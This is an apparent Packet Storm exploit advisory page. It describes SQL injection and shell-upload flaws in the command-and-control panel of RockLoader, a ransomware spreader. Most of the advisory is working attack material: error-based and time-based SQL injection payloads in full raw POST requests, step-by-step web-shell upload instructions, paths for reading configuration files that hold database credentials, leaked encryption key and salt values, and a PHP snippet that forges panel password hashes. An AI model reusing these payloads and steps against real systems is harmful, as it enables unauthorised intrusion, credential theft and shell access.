Twenty Year Anniversary

RockLoader SQL Injection / Shell Upload

RockLoader SQL Injection / Shell Upload
Posted Jun 30, 2016
Authored by Danail Velev

The RockLoader malware tool suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
MD5 | 9ead0cdbfb4aa372c930fa5b739b199a

RockLoader SQL Injection / Shell Upload

Change Mirror Download
# Exploit Title: RockLoader aka Bart Malware [SQLi] and shell file 
upload
# Date: 27-06-2016
# Software Link Leak: https://github.com/colocation/RockLoader-source
# Exploit Author: Danail Velev
# Contact: ICQ: 209030 / d.velev@colocation.bg
# Website: http://colocation.bg/
# Category: webapps / malware / private software / infection spreader /
C&C
# Inspiration: http://www.xylibox.com/

1. Description

Since last days ... new Bart aka RockLoader malware/rasomware spreader
is active.
My family was a victim of this type of extortion past year.

2. Short info: SQL Injections

NO user registration required.
The Command and Control Server processing the spread requests,user
tasks and responsible for the process, is suffering from mutiple remote
sql injection.
Common C&C server path is "/cp/login/" in most common setups.
Since the specific of the spreader and it's functionality, methods of
encryption and working process,
There is possibility for RCE,MSF/CMD injection and local root post
explotation.

In common cases the setup comes with this specific configs.
- user has full priviligies to host sql server.
- you can interact with local file read in most conditions.
- user is database administrator in most conditions.
- database name and structure are identical since it comes as
phpmyadmin dump.
- file write and read is a must.
- user screen capture plugin on advanced setups.
- default database name is 'appdater'


3. Proof of Concept:

Affected parameters are "username" and "password" via specifict POST
request.
The 3th parameter is the php session.

----=(SQL Injection 1)=----
Type: error-based
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT
COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118
UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)--
KSxg1=6 AND 000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------

=================================================================================================================================================================

POC:
----=(SQL Injection 2)=----
Type: AND/OR time-based blind
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 5.0.12 AND time-based blind
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND
000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------

=================================================================================================================================================================

POC:
----=(Shell Upload POC)=----
Requirements:
- Valid user for control panel.
- Access to database for reading.

Step1:
Upload your shell as new file via Control Panel.
Name it: OWNED
Note: filename is masked in control panel

Step2:
See 'file' table at 'appdater' database.
QUERY: SELECT * FROM `file`;
Look for name=OWNED and coresponding file_path name (EXAMPLE:
C932kc.php)

Step3:
Location of your Shell
http://127.0.0.1/files/c932kc.php

-----------------END--------------------
=================================================================================================================================================================
POC:
----=(Database user and password disclose)=----

Example request to get the directory location:

===============================================
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
===============================================
Response if error reporting is enabled:

<br />
<b>Notice</b>: A session had already been started - ignoring
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line
<b>23</b><br />


===============================================

Read the settings.php file of the control panel to obtain user and
password for database.
location: /var/www/html/cp/settings.php

----Snip-----
<?php
//Debug
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF

//MySQL settings
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_DATABASE', 'appdater'); <- most of the time this is the
default database since it's come in the bundle.
define('DB_PORT', '3307');

......
---EndSnip---
=================================================================================================================================================================
POC:
----=(XOR Encrypton key and password salt disclose)=----

Read the settings.php file (/var/www/appdater/html/settings.php)
Look at the global configuration for the app.

----Snip-----
//GLOBAL settings
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); <- File encryption XOR_KEY
define('FILES_URL', 'https://summerr554fox.su/files/'); <- address of
all uploaded files
define('APPDATER_PATH', '/var/www/html/');
define('SALT', 'KsqwGzTl?Qwq|oHA'); <- SALT KEY FOUND !
?>
---EndSnip---
TADAAAAAAAAAAAAAAAAAAAAAAAAAa we got the password for the sql and even
more: XOR_KEY for file encyption, EXE files location, PATH to the
Control Panel anddd....
The most important --> THE SALT !

=================================================================================================================================================================
POC:
---=(Admin panel password generator)=---

Read the core/functions.php file
(/var/www/appdater/html/core/functions.php)
Look for this

---Snip-----
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
----EndSnip---

TADAAAA so we got and the algo used to create correct user and
password.


<?php
define('SALT', 'KsqwGzTl?Qwq|oHA');
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
echo create_hash('S0M3PaSSw0rd');
?>

=================================================================================================================================================================


3. Solution:

DO NOT WRITE BUGGY APPZ:)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    5 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close